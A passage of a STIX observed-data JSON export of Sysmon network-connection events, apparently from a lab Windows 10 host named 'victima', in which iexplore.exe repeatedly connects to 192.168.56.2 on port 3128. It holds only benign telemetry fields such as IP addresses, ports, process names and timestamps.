| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:Z+m50jIHzKai3ZK4l2TF9YGcaVk=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:24.433Z", | |
| "last_observed": "2022-07-27T14:26:24.433Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--642f5dc9-f219-44ec-a75b-2a8411783917", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.926Z", | |
| "modified": "2022-07-28T16:05:22.926Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:37.167486281Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:30.659Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50177, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:PP38/Y+v+dOmTG/8JYaS1Hrck/4=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:24.573Z", | |
| "last_observed": "2022-07-27T14:26:24.573Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--006fb2da-02ea-4cac-90d6-52796975011f", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.927Z", | |
| "modified": "2022-07-28T16:05:22.927Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:39.479155537Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:33.132Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50203, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:O5PZvb6uVvusOR5H5LrVEyF2iLU=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:27.359Z", | |
| "last_observed": "2022-07-27T14:26:27.359Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--1994cb96-bbeb-42fb-ab3e-654f6b8bc024", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.927Z", | |
| "modified": "2022-07-28T16:05:22.927Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:39.479752024Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:33.132Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50204, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:zk3lP+CG3aF9VjMBvbFzUQLIOnI=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:27.406Z", | |
| "last_observed": "2022-07-27T14:26:27.406Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--db24761e-31a7-4835-9ae4-532e6340fe24", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.928Z", | |
| "modified": "2022-07-28T16:05:22.928Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:39.480344975Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:33.132Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50205, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:RDFuGWhd27dm2qDlJU8xT+1X348=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:27.452Z", | |
| "last_observed": "2022-07-27T14:26:27.452Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--49fd9653-902f-4465-b8c8-6cfde2709236", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.928Z", | |
| "modified": "2022-07-28T16:05:22.928Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:39.480970435Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:33.132Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50206, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:8CIjDZZStGnqqlj3usbsT/Flc+c=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:27.497Z", | |
| "last_observed": "2022-07-27T14:26:27.497Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--ef01b46f-86aa-4dbf-a93c-309e8a31708f", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.928Z", | |
| "modified": "2022-07-28T16:05:22.928Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:39.481575867Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:33.132Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50207, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:Pr2ca0fM1MeOtZdsMGI3VJ7wNkc=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:27.639Z", | |
| "last_observed": "2022-07-27T14:26:27.639Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--d6f4fe25-1ef4-4381-a37f-6eb1cb35f442", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.929Z", | |
| "modified": "2022-07-28T16:05:22.929Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:39.483474525Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:33.133Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50210, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:b3OUU27bJn/4EQ6swoPdgOolXFk=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:28.325Z", | |
| "last_observed": "2022-07-27T14:26:28.325Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--57795f99-d9fa-49ba-b5a6-4f939ab2f9f9", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.929Z", | |
| "modified": "2022-07-28T16:05:22.929Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:39.492387198Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:33.134Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50222, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:aYrNEKJuN/yELIpHNVpVKJti+qY=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:28.715Z", | |
| "last_observed": "2022-07-27T14:26:28.715Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--741f8bf5-9b0a-4de3-8360-4ec857ae5eaf", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.929Z", | |
| "modified": "2022-07-28T16:05:22.929Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:39.493008330Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:33.134Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50223, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
